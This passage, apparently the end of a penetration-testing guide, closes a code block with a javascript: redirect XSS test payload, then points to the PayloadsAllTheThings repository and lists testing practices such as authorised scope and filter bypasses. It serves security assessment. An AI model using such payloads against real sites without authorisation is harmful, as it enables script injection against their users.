?redirect=javascript:alert('XSS')
```
## Finding PayloadsAllTheThings

- GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
- Regular updates: the community maintains current bypasses and techniques
- Local mirror: clone the repository for offline reference during assessments
- Search: use the repository search to find payloads by vulnerability type

## Best Practices

- Test only in environments you are authorised to test
- Understand what a payload does before sending it
- Combine techniques (encoding, context breaks, filter bypasses) when a single payload is blocked
- Keep the local clone updated
- Record every payload used in the assessment notes
- Adapt payloads to the target's context (injection point, encoding, framework)
- Validate findings with a proper proof of exploitation rather than a filter bypass alone